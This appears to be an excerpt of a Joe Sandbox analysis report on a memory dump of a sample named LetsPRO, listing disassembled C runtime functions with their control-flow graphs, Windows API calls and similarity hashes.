                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfo_wcspbrk
                                        • String ID: ./\
                                        • API String ID: 668429958-3176372042
                                        • Opcode ID: 4430efe04cc8b82aef10764473239eac305df5202f5fd6ca90249b74527dc02b
                                        • Instruction ID: ecde39011dba5c9398f90109ce80f474310167d00a3904a64498e9a83f1a707e
                                        • Opcode Fuzzy Hash: 4430efe04cc8b82aef10764473239eac305df5202f5fd6ca90249b74527dc02b
                                        • Instruction Fuzzy Hash: 62C195B1905269DEDB20CF75CC44AEAB7BCBF19318F5001AAE55CD2A40E734D9A4CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C917CAD Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 320COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1743 6c917cad-6c917cdb 1744 6c917ce1-6c917ce3 1743->1744 1745 6c927cc8-6c927cdf call 6c90aaee call 6c900845 call 6c97b066 1743->1745 1744->1745 1747 6c917ce9-6c917cf8 call 6c900eef 1744->1747 1756 6c927ce4-6c927cea 1745->1756 1753 6c917d97-6c917da6 call 6c900845 call 6c90aaee 1747->1753 1754 6c917cfe-6c917d03 1747->1754 1771 6c917da8 1753->1771 1754->1756 1757 6c917d09-6c917d2f call 6c917c06 FindFirstFileExW 1754->1757 1759 6c927cf6-6c927d00 towlower 1756->1759 1760 6c927cec-6c927cf0 1756->1760 1766 6c927d91-6c927d9b 1757->1766 1767 6c917d35-6c917d4a call 6c900eef 1757->1767 1769 6c927d08-6c927d12 GetDriveTypeW 1759->1769 1760->1753 1760->1759 1774 6c927e0c-6c927e12 1766->1774 1775 6c927d9d-6c927da7 1766->1775 1767->1753 1786 6c917d4c-6c917d6c call 6c917dba 1767->1786 1772 6c917d8b-6c917d91 1769->1772 1773 6c927d18-6c927d1e 1769->1773 1778 6c917dab-6c917db9 call 6c900837 1771->1778 1772->1753 1783 6c927d80-6c927d8c call 6c90017e 1772->1783 1779 6c927d20-6c927d2b call 6c90017e 1773->1779 1780 6c927d2c-6c927d7b call 6c95a099 1773->1780 1781 6c927e24-6c927e3a FileTimeToLocalFileTime 1774->1781 1782 6c927e14-6c927e1a 1774->1782 1775->1774 1776 6c927da9-6c927db9 1775->1776 1784 6c927dc0-6c927dd6 call 6c90af5c 1776->1784 1785 6c927dbb 1776->1785 1779->1780 1808 6c927fd4-6c927ffc call 6c9506c1 1780->1808 1792 6c927e40-6c927e56 FileTimeToSystemTime 1781->1792 1793 6c92802d-6c928046 GetLastError call 6c90aaff FindClose 1781->1793 1782->1781 1791 6c927e1c-6c927e22 1782->1791 1783->1753 1784->1753 1811 6c927ddc-6c927de3 1784->1811 1785->1784 1786->1772 1815 6c917d6e-6c917d78 call 6c90221c 1786->1815 1802 6c927e9c-6c927ea2 1791->1802 1792->1793 1794 6c927e5c-6c927e99 call 6c95a099 1792->1794 1793->1771 1794->1802 1805 6c927ea4-6c927eaa 1802->1805 1806 6c927eba-6c927ed0 FileTimeToLocalFileTime 1802->1806 1805->1806 1812 6c927eac-6c927eb8 1805->1812 1806->1793 1814 6c927ed6-6c927eec FileTimeToSystemTime 1806->1814 1822 6c928008-6c928028 1808->1822 1823 6c927ffe-6c928005 1808->1823 1811->1753 1816 6c927de9-6c927e07 call 6c977eb4 call 6c90a76b 1811->1816 1817 6c927f32-6c927f38 1812->1817 1814->1793 1819 6c927ef2-6c927f2f call 6c95a099 1814->1819 1815->1769 1830 6c917d7e-6c917d85 call 6c917c87 1815->1830 1816->1778 1826 6c927f50-6c927f66 FileTimeToLocalFileTime 1817->1826 1827 6c927f3a-6c927f40 1817->1827 1819->1817 1822->1778 1823->1822 1826->1793 1832 6c927f6c-6c927f82 FileTimeToSystemTime 1826->1832 1827->1826 1831 6c927f42-6c927f4e 1827->1831 1830->1769 1830->1772 1836 6c927fc8-6c927fce FindClose 1831->1836 1832->1793 1833 6c927f88-6c927fc5 call 6c95a099 1832->1833 1833->1836 1836->1808
                                        APIs
                                        • _wcspbrk.LIBCMT(?,6C917824), ref: 6C917CEF
                                        • _getdrive.MSVCR100 ref: 6C917D09
                                          • Part of subcall function 6C917C06: GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,?), ref: 6C917C39
                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 6C917D20
                                        • _wcspbrk.LIBCMT(?,./\), ref: 6C917D41
                                          • Part of subcall function 6C917DBA: _errno.MSVCR100(?,?,?,6C917D65,?,?,00000104,?), ref: 6C917DC1
                                          • Part of subcall function 6C917DBA: _errno.MSVCR100(?,?,?,6C917D65,?,?,00000104,?), ref: 6C917DC8
                                          • Part of subcall function 6C917DBA: _wfullpath.MSVCR100(?,?,?,?,?,?,6C917D65,?,?,00000104,?), ref: 6C917DD9
                                          • Part of subcall function 6C917DBA: _errno.MSVCR100 ref: 6C917DE3
                                        • _wcslen.LIBCMT(00000000), ref: 6C917D6F
                                        • _errno.MSVCR100 ref: 6C917D97
                                        • __doserrno.MSVCR100 ref: 6C917DA1
                                        • __doserrno.MSVCR100 ref: 6C927CC8
                                        • _errno.MSVCR100 ref: 6C927CCF
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C927CDA
                                        • towlower.MSVCR100(00000000), ref: 6C927CF7
                                        • GetDriveTypeW.KERNEL32(00000000), ref: 6C927D09
                                        • free.MSVCR100(?), ref: 6C927D26
                                        • ___loctotime64_t.LIBCMT ref: 6C927D59
                                        • free.MSVCR100(?), ref: 6C927D86
                                          • Part of subcall function 6C917C87: _wcslen.LIBCMT(00000000,6C917D83), ref: 6C917C8A
                                        • _wsopen_s.MSVCR100(000000FF,?,00000000,00000040,00000000), ref: 6C927DCC
                                        • __fstat64i32.LIBCMT(000000FF,?), ref: 6C927DF0
                                        • _close.MSVCR100(000000FF,000000FF,?), ref: 6C927DFD
                                        • FindClose.KERNEL32(?), ref: 6C927FCE
                                        • ___wdtoxmode.LIBCMT ref: 6C927FDB
                                        • GetLastError.KERNEL32 ref: 6C92802D
                                        • __dosmaperr.LIBCMT(00000000), ref: 6C928034
                                        • FindClose.KERNEL32(?), ref: 6C928040
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$Find$Close__doserrno_wcslen_wcspbrkfree$CurrentDirectoryDriveErrorFileFirstLastType___loctotime64_t___wdtoxmode__dosmaperr__fstat64i32_close_getdrive_invalid_parameter_noinfo_wfullpath_wsopen_stowlower
                                        • String ID: ./\
                                        • API String ID: 679355030-3176372042
                                        • Opcode ID: 64b7c124a9907918c52e4b7be4932bd7124b026fb3d610c274535ba2d8c5b160
                                        • Instruction ID: 2e000e58d6b8b07a8e0baa620a9ef7398232bbd37a5a50866622c95c62ef778a
                                        • Opcode Fuzzy Hash: 64b7c124a9907918c52e4b7be4932bd7124b026fb3d610c274535ba2d8c5b160
                                        • Instruction Fuzzy Hash: CFC175F195522DDADB209F65CC44AE9B7FCBF19318F1002AAE55CE2A40E734D984CFA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9507B2 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 306COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1937 6c9507b2-6c9507e0 1938 6c9507e2-6c9507f9 call 6c90aaee call 6c900845 call 6c97b066 1937->1938 1939 6c9507fe-6c950800 1937->1939 1959 6c950be1 1938->1959 1939->1938 1940 6c950802-6c950811 call 6c900eef 1939->1940 1946 6c950813-6c950824 call 6c900845 call 6c90aaee 1940->1946 1947 6c950829-6c95082e 1940->1947 1946->1959 1950 6c950830-6c950836 1947->1950 1951 6c95084d call 6c917c06 1947->1951 1955 6c95083e-6c95084b towlower 1950->1955 1956 6c950838-6c95083c 1950->1956 1958 6c950852-6c950873 FindFirstFileExW 1951->1958 1955->1958 1956->1946 1956->1955 1961 6c95094d-6c950957 1958->1961 1962 6c950879-6c95088e call 6c900eef 1958->1962 1963 6c950be4-6c950bf2 call 6c900837 1959->1963 1967 6c950959-6c950963 1961->1967 1968 6c9509c8-6c9509ce 1961->1968 1962->1946 1974 6c950890-6c9508b0 call 6c917dba 1962->1974 1967->1968 1973 6c950965-6c950975 1967->1973 1970 6c9509d0-6c9509d6 1968->1970 1971 6c9509dd-6c9509f3 FileTimeToLocalFileTime 1968->1971 1970->1971 1975 6c9509d8-6c9509db 1970->1975 1976 6c9509f9-6c950a0f FileTimeToSystemTime 1971->1976 1977 6c950bc8-6c950bdb GetLastError call 6c90aaff FindClose 1971->1977 1978 6c950977 1973->1978 1979 6c95097c-6c950992 call 6c90af5c 1973->1979 1994 6c950930-6c950936 1974->1994 1995 6c9508b2-6c9508bc call 6c90221c 1974->1995 1982 6c950a52-6c950a58 1975->1982 1976->1977 1983 6c950a15-6c950a4f call 6c9591eb 1976->1983 1977->1959 1978->1979 1979->1946 1992 6c950998-6c95099f 1979->1992 1988 6c950a67-6c950a7d FileTimeToLocalFileTime 1982->1988 1989 6c950a5a-6c950a60 1982->1989 1983->1982 1988->1977 1993 6c950a83-6c950a99 FileTimeToSystemTime 1988->1993 1989->1988 1991 6c950a62-6c950a65 1989->1991 1997 6c950ad9-6c950ae2 1991->1997 1992->1946 1998 6c9509a5-6c9509c3 call 6c976eab call 6c90a76b 1992->1998 1993->1977 1999 6c950a9f-6c950ad6 call 6c9591eb 1993->1999 1994->1946 2000 6c95093c-6c950948 call 6c90017e 1994->2000 2013 6c9508c7-6c9508d1 GetDriveTypeW 1995->2013 2014 6c9508be-6c9508c5 call 6c917c87 1995->2014 2004 6c950ae4-6c950aea 1997->2004 2005 6c950af1-6c950b07 FileTimeToLocalFileTime 1997->2005 1998->1963 1999->1997 2000->1946 2004->2005 2010 6c950aec-6c950aef 2004->2010 2005->1977 2012 6c950b0d-6c950b23 FileTimeToSystemTime 2005->2012 2016 6c950b63-6c950b6c FindClose 2010->2016 2012->1977 2017 6c950b29-6c950b60 call 6c9591eb 2012->2017 2013->1994 2019 6c9508d3-6c9508d9 2013->2019 2014->1994 2014->2013 2023 6c950b72-6c950b9a call 6c9506c1 2016->2023 2017->2016 2024 6c9508e7-6c95092b call 6c9591eb 2019->2024 2025 6c9508db-6c9508e6 call 6c90017e 2019->2025 2033 6c950ba6-6c950bc6 2023->2033 2034 6c950b9c-6c950ba3 2023->2034 2024->2023 2025->2024 2033->1963 2034->2033
                                        APIs
                                        • __doserrno.MSVCR100 ref: 6C9507E2
                                        • _errno.MSVCR100 ref: 6C9507E9
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C9507F4
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _wcspbrk.LIBCMT(?,6C917824), ref: 6C950808
                                        • _errno.MSVCR100 ref: 6C950813
                                        • __doserrno.MSVCR100 ref: 6C95081D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfo_wcspbrk
                                        • String ID: ./\
                                        • API String ID: 668429958-3176372042
                                        • Opcode ID: 9b3d8b79d0b5552ddb64d7d80c93a5caa10bbde5b6203cca661381b3b644a878
                                        • Instruction ID: 3c1b0937c44de86e81ba6f899e3a5c9033a864559b90a408655a035f763aeb2d
                                        • Opcode Fuzzy Hash: 9b3d8b79d0b5552ddb64d7d80c93a5caa10bbde5b6203cca661381b3b644a878
                                        • Instruction Fuzzy Hash: 3EC192F1D451699ADB20CF658C44BEAB7BCBF1531CF5002EAE258E2580EB34DA94CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9088CA Relevance: 18.2, APIs: 12, Instructions: 160stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000002,?,?,00000000), ref: 6C90866D
                                        • free.MSVCR100(?,?,?,00000000), ref: 6C90868E
                                        • _calloc_crt.MSVCR100(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C90888F
                                        • strncpy_s.MSVCR100(00000000,00000000,00000000,-00000001), ref: 6C9088A9
                                        • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6C908914
                                        • _calloc_crt.MSVCR100(00000000,00000002,?,?,00000000), ref: 6C908923
                                        • GetLocaleInfoW.KERNEL32(?,00001004,00000000,00000000,?,?,00000000), ref: 6C90893C
                                        • free.MSVCR100(00000000), ref: 6C930748
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: InfoLocale$_calloc_crtfree$strncpy_s
                                        • String ID:
                                        • API String ID: 2432546303-0
                                        • Opcode ID: 3ca070513a338c9191d4f15d4863cdfe28a5b442caf70c7eec4e94dc4e83deab
                                        • Instruction ID: 6b5dd8227629a9b87fd4b33fd14d114689a2fd4b62bf1f015777dec326dd3fb4
                                        • Opcode Fuzzy Hash: 3ca070513a338c9191d4f15d4863cdfe28a5b442caf70c7eec4e94dc4e83deab
                                        • Instruction Fuzzy Hash: 0651B172B01216EBEF159E658C44BAB3BB8BF2136CF2141AEE81892540DF31C954CF68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9085EC Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,20001004,00000005,00000002,?,?,6C90852D,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C90860D
                                        • strcmp.MSVCR100(00000000,ACP,?,?,6C90852D,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C912871
                                        • strcmp.MSVCR100(00000000,OCP,?,?,6C90852D,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C9317D4
                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00000005,00000002,?,?,6C90852D,?,6C906D9D,?,000000BC,?,00000000,00000000,00000005), ref: 6C9317ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: InfoLocalestrcmp
                                        • String ID: ACP$OCP
                                        • API String ID: 3191669094-711371036
                                        • Opcode ID: 17445c587723cbc84e54a2e59c52dc92d282ce65e4d1ca8598d353457df7ee82
                                        • Instruction ID: e3f47e778231c36b0fcc09eed66715375bf49098f12c78a1344dda77104659a0
                                        • Opcode Fuzzy Hash: 17445c587723cbc84e54a2e59c52dc92d282ce65e4d1ca8598d353457df7ee82
                                        • Instruction Fuzzy Hash: 7A01D83170961EBAEB258A65EC09F9A37BCAB0375DF3044F9E405E1C90DF30C641C698
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90A21D Relevance: 12.2, APIs: 8, Instructions: 225COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • wcsncpy_s.MSVCR100(?,000000FF,?,00000000,?,?,?,?,?,6C90A1C4,?,?,?,?,?,?), ref: 6C90A318
                                        • wcsncpy_s.MSVCR100(?,000000FF,?,?,?,?,?,?,?,6C90A1C4,?,?,?,?,?,?), ref: 6C9312DA
                                        • wcsncpy_s.MSVCR100(?,000000FF,00000000,?,?,?,?,?,?,6C90A1C4,?,?,?,?,?,?), ref: 6C931303
                                        • wcsncpy_s.MSVCR100(?,000000FF,?,?,?,?,?,?,?,6C90A1C4,?,?,?,?,?,?), ref: 6C931320
                                        • _errno.MSVCR100(?,?,?,?,?,6C90A1C4,?,?,?,?,?,?,?,?,?), ref: 6C931389
                                        • _invalid_parameter_noinfo.MSVCR100(?,?,?,?,?,6C90A1C4,?,?,?,?,?,?,?,?,?), ref: 6C931393
                                        • _errno.MSVCR100(?,?,?,?,?,6C90A1C4,?,?,?,?,?,?,?,?,?), ref: 6C9313A4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: wcsncpy_s$_errno$_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2268458229-0
                                        • Opcode ID: b64b2c061266d081c9ed4d5b5879bee082dc584780e9e17a906c626ae834c6df
                                        • Instruction ID: a0fa2b9e910466b34503f6934a37f4712176331175f04ec0a482e7dde2c17130
                                        • Opcode Fuzzy Hash: b64b2c061266d081c9ed4d5b5879bee082dc584780e9e17a906c626ae834c6df
                                        • Instruction Fuzzy Hash: 3971D931A04266CB9F188F1D884049A36B9EFA6358B35933FE82896D60FB71D9C1C7C5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C903B5D Relevance: 12.2, APIs: 8, Instructions: 223COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcsncpy_s.MSVCR100(?,?,?,00000000), ref: 6C903C65
                                        • wcsncpy_s.MSVCR100(?,?,00000000,?), ref: 6C903C8C
                                        • wcsncpy_s.MSVCR100(?,00000003,?,00000002), ref: 6C903CBE
                                        • wcsncpy_s.MSVCR100(?,?,?,?), ref: 6C903D00
                                        • _errno.MSVCR100 ref: 6C931409
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C931413
                                        • _errno.MSVCR100 ref: 6C931424
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: wcsncpy_s$_errno$_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2268458229-0
                                        • Opcode ID: fcf4b62c903f67a57afe48d88fb953345b3b72aa41c3411e11ee158d1a33b60d
                                        • Instruction ID: 920da5b93d5b059654373c1b8ab5f62b37dc41b63108c92a0bfa8a7719a0e1d7
                                        • Opcode Fuzzy Hash: fcf4b62c903f67a57afe48d88fb953345b3b72aa41c3411e11ee158d1a33b60d
                                        • Instruction Fuzzy Hash: DA719131A45226DBDF189F2988458AE36A9FFA530DB25923FFC1897D10F7B1C891C781
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C900837 Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 6C97C304
                                        • _crt_debugger_hook.MSVCR100(00000001), ref: 6C97C311
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C97C319
                                        • UnhandledExceptionFilter.KERNEL32(6C97C350), ref: 6C97C324
                                        • _crt_debugger_hook.MSVCR100(00000001), ref: 6C97C335
                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 6C97C340
                                        • TerminateProcess.KERNEL32(00000000), ref: 6C97C347
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                        • String ID:
                                        • API String ID: 3369434319-0
                                        • Opcode ID: 5672be40680f44efd8e0b31aa88b8bef25a5ef09bab2ded615c31f9833098fbe
                                        • Instruction ID: 8cb4770bb78bd2e87a74630f9f9dba488e1c3b711d1dd1a0f64beaa68d27fbc9
                                        • Opcode Fuzzy Hash: 5672be40680f44efd8e0b31aa88b8bef25a5ef09bab2ded615c31f9833098fbe
                                        • Instruction Fuzzy Hash: 7821C5B4A092849FEF58DFA9E14864C3BB4FF1A358F24145BE80887660E7709584CF59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C97C24F Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 6C97C304
                                        • _crt_debugger_hook.MSVCR100(00000001), ref: 6C97C311
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6C97C319
                                        • UnhandledExceptionFilter.KERNEL32(6C97C350), ref: 6C97C324
                                        • _crt_debugger_hook.MSVCR100(00000001), ref: 6C97C335
                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 6C97C340
                                        • TerminateProcess.KERNEL32(00000000), ref: 6C97C347
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
                                        • String ID:
                                        • API String ID: 3369434319-0
                                        • Opcode ID: c0cbd42e0377fe9da54611e149153fd0f21ea4c04ce8404e37495883b902ee45
                                        • Instruction ID: 2bc8a7c5415796e9ea6bf62dcd991f0c766916b1ce617faa6d765cc1030b159a
                                        • Opcode Fuzzy Hash: c0cbd42e0377fe9da54611e149153fd0f21ea4c04ce8404e37495883b902ee45
                                        • Instruction Fuzzy Hash: FB21E3B4A093849FEB58DFA8E148A4C3BB4FF1A348F20146BE80887760E7709484CF59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90875C Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,00000080,?,?,00000000), ref: 6C90878C
                                        • GetLocaleInfoW.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 6C9087DE
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,?,00000000,00000000,?,?,00000000), ref: 6C9087FC
                                        • _freea_s.MSVCR100(00000000,?,?,00000000), ref: 6C908805
                                        • malloc.MSVCR100(00000008,?,?,00000000), ref: 6C931480
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: InfoLocale$ByteCharMultiWide_freea_smalloc
                                        • String ID:
                                        • API String ID: 221122905-0
                                        • Opcode ID: b919d6bed76fc983e9a3fa95dd29a7662f51e0991ddd62b42cfad181bd10155e
                                        • Instruction ID: 23d8114a1bc1510a4ef1b601934f8e7477f8a62af30adc111b74f1d950fcb886
                                        • Opcode Fuzzy Hash: b919d6bed76fc983e9a3fa95dd29a7662f51e0991ddd62b42cfad181bd10155e
                                        • Instruction Fuzzy Hash: 6121D371701224AFCF048FA5DC84CAF7BA9EF5A764B20416AF929D2A60D730C950CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C906630 Relevance: 7.6, APIs: 5, Instructions: 85COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100(75918410,?,?,6C9084A6,?,0000000A,00000000), ref: 6C9278FE
                                        • _invalid_parameter_noinfo.MSVCR100(75918410,?,?,6C9084A6,?,0000000A,00000000), ref: 6C927908
                                        • _errno.MSVCR100(0000009C,75918410,?,?,6C9084A6,?,0000000A,00000000), ref: 6C927914
                                        • _invalid_parameter_noinfo.MSVCR100(0000009C,75918410,?,?,6C9084A6,?,0000000A,00000000), ref: 6C92791E
                                        • _errno.MSVCR100(0000009C,75918410,?,?,6C9084A6,?,0000000A,00000000), ref: 6C92792A
                                        Memory Dump Source
